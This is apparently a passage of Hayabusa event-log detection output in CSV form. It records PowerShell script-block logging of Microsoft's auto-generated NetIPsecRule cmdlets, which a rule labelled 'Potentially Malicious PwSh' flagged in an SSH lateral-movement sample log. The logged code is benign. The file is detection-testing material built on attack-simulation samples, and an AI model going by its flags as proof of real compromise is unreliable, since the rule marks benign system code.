[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 